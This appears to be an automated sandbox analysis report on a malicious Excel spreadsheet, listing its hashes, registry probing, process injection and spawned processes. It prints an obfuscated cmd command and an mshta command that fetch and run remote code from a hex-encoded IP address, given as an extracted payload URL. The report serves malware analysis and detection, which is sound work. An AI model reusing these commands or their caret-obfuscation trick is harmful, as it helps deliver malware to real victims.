Analysis
max time kernel: 130s
max time network: 130s
platform: windows10_x64
resource: win10-en-20211208
submitted: 20-01-2022 11:43
Behavioral task: behavioral1
Sample: edefd18d0580d8d25297bcddc843c3478c20f650b124224460ca9ae267529878.xls
Resource: win10-en-20211208
General
Target: edefd18d0580d8d25297bcddc843c3478c20f650b124224460ca9ae267529878.xls
Size: 142KB
MD5: 81f0a7a1ad8bf108c2648af767e77fcd
SHA1: 9575d97617b4d5b9c22f5d2a0fbfbd3de1ad3de4
SHA256: edefd18d0580d8d25297bcddc843c3478c20f650b124224460ca9ae267529878
SHA512: 6ed134fd7cba8ddd3c195f5e31a1ce996b8bc5403933a47a23666b483720eb140ca7a8ba5fda71961ef5c7125e9a5b5575f60fb57d3c48879df75bb1980c5967
Malware Config
Extracted: http://0xb907d607/fer/fer.html
Signatures

Process spawned unexpected child process (1 IoC)
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
  description | pid | pid_target | Process | procid_target
  Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process | 2780 | 1892 | cmd.exe | 68

Blocklisted process makes network request (1 IoC)
Processes:
  flow | pid | Process
  43 | 1152 | mshta.exe

Checks processor information in registry (2 TTPs, 3 IoCs)
Processor information is often read in order to detect sandboxing environments.
Processes:
  description | ioc | Process
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | EXCEL.EXE
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | EXCEL.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | EXCEL.EXE

Enumerates system info in registry (2 TTPs, 3 IoCs)
Processes:
  description | ioc | Process
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | EXCEL.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | EXCEL.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener (1 IoC)
Processes:
  pid | Process
  1892 | EXCEL.EXE

Suspicious use of SetWindowsHookEx (13 IoCs)
Processes:
  pid | Process
  1892 | EXCEL.EXE (13 occurrences)

Suspicious use of WriteProcessMemory (6 IoCs)
Processes:
  description | pid | Process | procid_target
  PID 1892 wrote to memory of 2684 | 1892 | EXCEL.EXE | 70
  PID 1892 wrote to memory of 2684 | 1892 | EXCEL.EXE | 70
  PID 1892 wrote to memory of 2780 | 1892 | EXCEL.EXE | 72
  PID 1892 wrote to memory of 2780 | 1892 | EXCEL.EXE | 72
  PID 2780 wrote to memory of 1152 | 2780 | cmd.exe | 74
  PID 2780 wrote to memory of 1152 | 2780 | cmd.exe | 74
Processes
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE (PID 1892)
  Command line: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\edefd18d0580d8d25297bcddc843c3478c20f650b124224460ca9ae267529878.xls"
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  C:\Windows\splwow64.exe (PID 2684)
    Command line: C:\Windows\splwow64.exe 12288
  C:\Windows\SYSTEM32\cmd.exe (PID 2780)
    Command line: cmd /c m^sh^t^a h^tt^p^:/^/0xb907d607/fer/fer.html
    - Process spawned unexpected child process
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\mshta.exe (PID 1152)
      Command line: mshta http://0xb907d607/fer/fer.html
      - Blocklisted process makes network request